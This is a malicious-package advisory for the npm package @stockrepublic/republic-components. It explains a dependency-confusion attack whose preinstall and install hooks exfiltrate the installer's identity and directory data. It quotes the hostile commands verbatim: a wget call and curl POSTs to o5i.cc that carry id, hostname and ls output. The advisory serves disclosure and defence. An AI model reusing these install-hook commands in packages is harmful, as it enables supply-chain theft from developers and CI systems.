npm · Malicious package advisory
Malware@stockrepublic/republic-components
MAL-2026-4289
Malicious code in @stockrepublic/republic-components (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (300b309644b646817c47a283d8b9aaa018e8ae0f59986207f55fd0c39dca872a)
The package masquerades as an internal @stockrepublic component (version 99.0.0, description 'Runs git diff and saves the output to git.log on install') but performs no git operation. Two independent install-time exfiltration paths fire on `npm install`:
1. package.json `preinstall` runs `wget --quiet "http://o5i.cc/supp?user=$(whoami)&path=$(pwd)&hostname=$(hostname)"`, leaking the installer's username, working directory, and hostname over plain HTTP to o5i.cc.
2. package.json `install` runs `node index.js`, which at index.js line 11 invokes `execSync("id > log.txt; ls -la >> log.txt; hostname >> log.txt; curl -X POST -F file=@log.txt https://o5i.cc/supp; curl -X POST -d \"$(id)\" https://o5i.cc/supp")`, exfiltrating uid/gid output and a directory listing of the consumer's project.
The inflated 99.0.0 version in a scoped namespace, combined with a cover-story description that does not match the code, is the canonical dependency-confusion pattern targeting an organization's private @stockrepublic registry. Any developer or CI system that pulls this public package by mistake leaks identity and filesystem metadata to attacker infrastructure.
## Source: ossf-package-analysis (f5dd919316a540368ded0f9b3b7dc25a4f937373069ad4dfe1262c3b48f2949c)
The OpenSSF Package Analysis project identified '@stockrepublic/republic-components' @ 99.0.0 (npm) as malicious.
It is considered malicious because:
- The package executes one or more commands associated with malicious behavior.
Compromised versions (2)
- 99.0.0
- 100.0.0
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.